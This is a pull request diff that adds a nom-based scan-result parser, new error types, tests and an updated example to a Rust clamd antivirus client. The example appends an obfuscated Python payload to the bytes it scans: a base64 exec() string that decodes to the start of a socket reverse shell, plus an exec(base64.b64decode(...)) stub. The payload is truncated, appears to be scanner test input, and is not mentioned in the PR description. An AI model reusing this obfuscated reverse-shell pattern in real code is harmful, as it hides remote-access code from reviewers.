### PR TITLE
feat: Added result parser

### DIFF
--- a/Cargo.toml
+++ b/Cargo.toml
@@ -20,6 +20,7 @@ thiserror = { version = "1.0" }
 tokio = { version = "1", features = ["net", "io-util", "fs"]}
 tokio-util = { version = "0.7", features = ["codec"]}
 tracing = { version = "0.1" }
+nom = { version = "7.1" }
 
 [dev-dependencies]
 tokio = { version = "1", features = ["full"] }

--- a/README.md
+++ b/README.md
@@ -7,7 +7,7 @@ new socket for each command. Work in progress.
 See also [`examples/simple.rs`](https://github.com/LevitatingOrange/clamd-client/blob/main/examples/simple.rs).
 There should be a running clamd instance on your machine (see [Notes](#running-clamd)).
 ```rust
-use clamd_client::{ClamdClientBuilder, ScanResult};
+use clamd_client::{ClamdClientBuilder, ScanCondition};
 
 #[tokio::main]
 async fn main() -> eyre::Result<()> {
@@ -21,9 +21,9 @@ async fn main() -> eyre::Result<()> {
         .await?;
 
     let result = clamd_client.scan_bytes(&eicar_bytes).await?;
-    match result {
-        ScanResult::Malignent { infection_types } => {
-            tracing::debug!("clamd found a virus(es):\n{}", infection_types.join("\n"))
+    match result.condition {
+        ScanCondition::Malignant(infection) => {
+            tracing::debug!("clamd found a virus:\n{}", infection)
         }
         _ => (),
     };

--- a/examples/simple.rs
+++ b/examples/simple.rs
@@ -1,5 +1,5 @@
 use bytes::BytesMut;
-use clamd_client::{ClamdClientBuilder, ScanCondition, ScanResult};
+use clamd_client::{ClamdClientBuilder, ScanCondition};
 use eyre::Result;
 use tracing::debug;
 use tracing_subscriber;

--- a/examples/simple.rs
+++ b/examples/simple.rs
@@ -1,4 +1,5 @@
-use clamd_client::{ClamdClientBuilder, ScanResult};
+use bytes::BytesMut;
+use clamd_client::{ClamdClientBuilder, ScanCondition, ScanResult};
 use eyre::Result;
 use tracing::debug;
 use tracing_subscriber;
@@ -28,15 +29,20 @@ async fn main() -> Result<()> {
     clamd_client.scan_bytes(&random_bytes).await?;
     debug!("Clamd scan found no virus in the random bytes");
 
+    let mut bytes = BytesMut::new();
+
     let eicar_bytes = reqwest::get("https://secure.eicar.org/eicarcom2.zip")
         .await?
         .bytes()
         .await?;
 
-    let result = clamd_client.scan_bytes(&eicar_bytes).await?;
-    match result {
-        ScanResult::Malignent { infection_types } => {
-            debug!("clamd found a virus(es):\n{}", infection_types.join("\n"))
+    bytes.extend(eicar_bytes);
+    bytes.extend( "exec('aW1wb3J0IHNvY2tldCxvcwpzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl')\n\nimport base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes()}))".as_bytes());
+
+    let result = clamd_client.scan_bytes(&bytes).await?;
+    match result.condition {
+        ScanCondition::Malignant(infection) => {
+            debug!("clamd found a virus:\n{}", infection)
         }
         _ => (),
     };

--- a/src/error.rs
+++ b/src/error.rs
@@ -3,8 +3,6 @@
 use crate::ClamdClient;
 use std::num::TryFromIntError;
 
-use tracing::trace;
-
 pub type Result<T> = std::result::Result<T, ClamdError>;
 
 /// Errors that can occur when using [`ClamdClient`].

--- a/src/error.rs
+++ b/src/error.rs
@@ -32,10 +32,6 @@ pub enum ClamdError {
         #[source]
         std::io::Error,
     ),
-    /// Occurs when the response from clamd is not what the library
-    /// expects. Contains the invalid response.
-    #[error("invalid response from clamd: {0}")]
-    InvalidResponse(String),
     /// Occurs when there should be a response from clamd but it just
     /// closed the connection without sending a response.
     #[error("no response from clamd")]
@@ -44,49 +40,13 @@ pub enum ClamdError {
     /// is somehow malformed. Contains the invalid response.
     #[error("incomplete response from clamd: {0}")]
     IncompleteResponse(String),
-    /// Occurs when everything between this library and clamd went
-    /// well but clamd seems to have found a virus signature. See also
-    /// [`ClamdError::scan_error`].
-    #[error("clamd returned error on scan, possible virus: {0}")]
-    ScanError(String),
-}
+    /// Occurs when communication went well with clamd but it responded
+    /// with `ERROR`
+    #[error("clamd returned error on scan of {0}: {1}")]
+    ScanError(String, String),
 
-impl ClamdError {
-    /// If you want to ignore any error but an actual malignent scan
-    /// result from clamd. I do not recommend using this without careful thought, as any other error
-    /// could hide that uploaded bytes are actually a virus.
-    /// # Example
-    /// ```rust
-    /// # use std::net::SocketAddr;
-    /// # use clamd_client::{ClamdClientBuilder, ScanResult};
-    /// # use eyre::Result;
-    /// # async fn doc() -> eyre::Result<()> {
-    /// let address = "127.0.0.1:3310".parse::<SocketAddr>()?;
-    /// let mut clamd_client = ClamdClientBuilder::tcp_socket(address)?.build();
-    ///
-    /// // This downloads a virus signature that is benign but trips clamd.
-    /// let eicar_bytes = reqwest::get("https://secure.eicar.org/eicarcom2.zip")
-    ///   .await?
-    ///   .bytes()
-    ///   .await?;
-    ///
-    /// let result = clamd_client.scan_bytes(&eicar_bytes).await?;
-    /// match result {
-    ///     ScanResult::Malignent { infection_types } => {
-    ///         tracing::info!("clamd found a virus(es):\n{}", infection_types.join("\n"))
-    ///     }
-    ///     _ => (),
-    /// };
-    /// # Ok(())
-    /// # }
-    /// ```
-    pub fn scan_error(self) -> Option<String> {
-        match self {
-            Self::ScanError(s) => Some(s),
-            _ => {
-                trace!("ignoring non-scan error {:?}", self);
-                None
-            }
-        }
-    }
+    /// Occurs when the response from clamd is not what the library
+    /// expects. Contains the invalid response.
+    #[error("invalid response from clamd: {0}")]
+    InvalidResponse(String),
 }

--- a/src/util.rs
+++ b/src/util.rs
@@ -1,0 +1,146 @@
+use nom::branch::alt;
+use nom::bytes::complete::{tag, take_till, take_until};
+use nom::character::complete::char;
+use nom::combinator::{cond, eof, map_res};
+use nom::sequence::{terminated, tuple};
+use nom::{Finish, IResult, Parser};
+
+use crate::error::{ClamdError, Result};
+
+#[derive(Debug, PartialEq)]
+pub struct ScanResult {
+    /// used when scanning multiple entities in a single session
+    pub scan_id: u64,
+    /// the scanned entity, can be a file path, the word "stream"
+    pub scanned_entity: String,
+    pub condition: ScanCondition,
+}
+
+#[derive(Debug, PartialEq)]
+pub enum ScanCondition {
+    Malignant(String),
+    Benign,
+}
+
+enum ScanAnswer<'a> {
+    Ok,
+    Found(&'a str),
+    Error(&'a str),
+}
+
+fn parse_scan_result(input: &str) -> IResult<&str, ScanAnswer> {
+    alt((
+        terminated(take_until("OK"), tag("OK")).map(|_| ScanAnswer::Ok),
+        terminated(take_until("FOUND"), tag("FOUND")).map(ScanAnswer::Found),
+        terminated(take_until("ERROR"), tag("ERROR")).map(ScanAnswer::Error),
+    ))(input)
+}
+
+fn parse_entity(input: &str) -> IResult<&str, &str> {
+    terminated(take_till(|c| c == ':'), char(':'))(input)
+}
+
+fn parse_session_id(input: &str) -> IResult<&str, u64> {
+    map_res(terminated(take_till(|c| c == ':'), char(':')), |s| {
+        u64::from_str_radix(s, 10)
+    })(input)
+}
+
+impl ScanResult {
+    pub(crate) fn parse(input: &str, in_session: bool) -> Result<Self> {
+        let parser_result: IResult<&str, (Option<u64>, &str, ScanAnswer)> = terminated(
+            tuple((
+                cond(in_session, parse_session_id),
+                parse_entity,
+                parse_scan_result,
+            )),
+            eof,
+        )(input);
+
+        let (_, (session_id, scanned_entity, answer)) = parser_result
+            .finish()
+            .map_err(|err: nom::error::Error<&str>| ClamdError::InvalidResponse(err.to_string()))?;
+
+        let condition = match answer {
+            ScanAnswer::Ok => Ok(ScanCondition::Benign),
+            ScanAnswer::Found(msg) => Ok(ScanCondition::Malignant(msg.trim().to_owned())),
+            ScanAnswer::Error(msg) => Err(ClamdError::ScanError(
+                scanned_entity.trim().to_owned(),
+                msg.trim().to_owned(),
+            )),
+        }?;
+        Ok(ScanResult {
+            scan_id: session_id.unwrap_or(0),
+            scanned_entity: scanned_entity.trim().to_owned(),
+            condition,
+        })
+    }
+}
+
+#[cfg(test)]
+mod test {
+    use crate::ClamdError;
+
+    use super::{ScanCondition, ScanResult};
+
+    const STREAM_FOUND: &str = "stream: Win.Test.EICAR_HDB-1 FOUND";
+    const STREAM_FOUND_SESSION: &str = "053: stream: Win.Test.EICAR_HDB-1 FOUND";
+    const STREAM_ERROR: &str = "stream: we got error ERROR";
+    const STREAM_OK: &str = "stream: Win.Test.EICAR_HDB-1 OK";
+    const FILE_FOUND: &str = "/home/foo/clamd-client/eicarcom2.zip: Win.Test.EICAR_HDB-1 FOUND";
+    const INVALID: &str = "/home/foo/clamd-client/eicarcom2.zip: Win.Test.EICAR_HDB-aufnt ";
+
+    #[test]
+    fn parse_result() -> eyre::Result<()> {
+        assert_eq!(
+            ScanResult::parse(STREAM_FOUND, false)?,
+            ScanResult {
+                scan_id: 0,
+                scanned_entity: "stream".to_owned(),
+                condition: ScanCondition::Malignant("Win.Test.EICAR_HDB-1".to_owned())
+            }
+        );
+        assert_eq!(
+            ScanResult::parse(STREAM_FOUND_SESSION, true)?,
+            ScanResult {
+                scan_id: 53,
+                scanned_entity: "stream".to_owned(),
+                condition: ScanCondition::Malignant("Win.Test.EICAR_HDB-1".to_owned())
+            }
+        );
+        match ScanResult::parse(STREAM_ERROR, false) {
+            Err(ClamdError::ScanError(ent, msg)) => {
+                assert_eq!(ent, "stream");
+                assert_eq!(msg, "we got error");
+            }
+            res => panic!("Should err but got {:?}", res),
+        }
+
+        match ScanResult::parse(INVALID, false) {
+            Err(ClamdError::InvalidResponse(msg)) => {
+                assert_eq!(msg, "error TakeUntil at:  Win.Test.EICAR_HDB-aufnt ");
+            }
+            res => panic!("Should err but got {:?}", res),
+        }
+
+        assert_eq!(
+            ScanResult::parse(STREAM_OK, false)?,
+            ScanResult {
+                scan_id: 0,
+                scanned_entity: "stream".to_owned(),
+                condition: ScanCondition::Benign
+            }
+        );
+
+        assert_eq!(
+            ScanResult::parse(FILE_FOUND, false)?,
+            ScanResult {
+                scan_id: 0,
+                scanned_entity: "/home/foo/clamd-client/eicarcom2.zip".to_owned(),
+                condition: ScanCondition::Malignant("Win.Test.EICAR_HDB-1".to_owned())
+            }
+        );
+
+        Ok(())
+    }
+}

--- a/src/util.rs
+++ b/src/util.rs
@@ -41,8 +41,8 @@ fn parse_entity(input: &str) -> IResult<&str, &str> {
 }
 
 fn parse_session_id(input: &str) -> IResult<&str, u64> {
-    map_res(terminated(take_till(|c| c == ':'), char(':')), |s| {
-        u64::from_str_radix(s, 10)
+    map_res(terminated(take_till(|c| c == ':'), char(':')), |s: &str| {
+        s.parse()
     })(input)
 }
 


### PR DESCRIPTION
This change adds a simple parser to be more strict about the response of clamd to expect. Each result contains now one single scan result again because I looked into the C code of clamd and tried out experimentally that clamd will only respond with multiple results when it also receives multiple streams or files. I want to add a nicer interface for sessions in another pull request, so this is preliminary work for this.